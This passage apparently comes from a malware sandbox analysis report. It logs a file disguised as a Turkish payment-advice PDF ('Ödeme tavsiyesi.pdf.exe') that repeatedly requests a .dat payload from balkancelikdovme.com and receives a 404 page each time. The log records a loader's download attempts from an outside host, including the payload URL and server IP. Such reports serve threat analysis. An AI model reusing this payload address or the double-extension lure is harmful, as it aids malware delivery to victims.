      2024-12-16 13:19:15 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      49192.168.2.749940185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:19:16 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:19:17 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:19:16 GMT
      vary: User-Agent
      2024-12-16 13:19:17 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      50192.168.2.749944185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:19:18 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:19:19 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:19:18 GMT
      vary: User-Agent
      2024-12-16 13:19:19 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      51192.168.2.749949185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:19:20 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:19:20 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:19:20 GMT
      vary: User-Agent
      2024-12-16 13:19:20 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      52192.168.2.749954185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:19:22 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:19:22 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:19:22 GMT
      vary: User-Agent
      2024-12-16 13:19:22 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      53192.168.2.749960185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:19:24 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:19:24 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:19:24 GMT
      vary: User-Agent
      2024-12-16 13:19:24 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      54192.168.2.749965185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:19:25 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:19:26 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:19:26 GMT
      vary: User-Agent
      2024-12-16 13:19:26 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      55192.168.2.749969185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:19:27 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:19:28 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:19:28 GMT
      vary: User-Agent
      2024-12-16 13:19:28 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      56192.168.2.749975185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:19:29 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:19:30 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:19:29 GMT
      vary: User-Agent
      2024-12-16 13:19:30 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      57192.168.2.749980185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:19:31 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:19:32 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:19:31 GMT
      vary: User-Agent
      2024-12-16 13:19:32 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      58192.168.2.749986185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:19:33 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:19:33 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:19:33 GMT
      vary: User-Agent
      2024-12-16 13:19:33 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      59192.168.2.749990185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:19:35 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:19:35 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:19:35 GMT
      vary: User-Agent
      2024-12-16 13:19:35 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      60192.168.2.749996185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:19:37 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:19:37 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:19:37 GMT
      vary: User-Agent
      2024-12-16 13:19:37 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      61192.168.2.750001185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:19:39 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:19:39 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:19:39 GMT
      vary: User-Agent
      2024-12-16 13:19:39 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      62192.168.2.750006185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:19:40 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:19:41 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:19:41 GMT
      vary: User-Agent
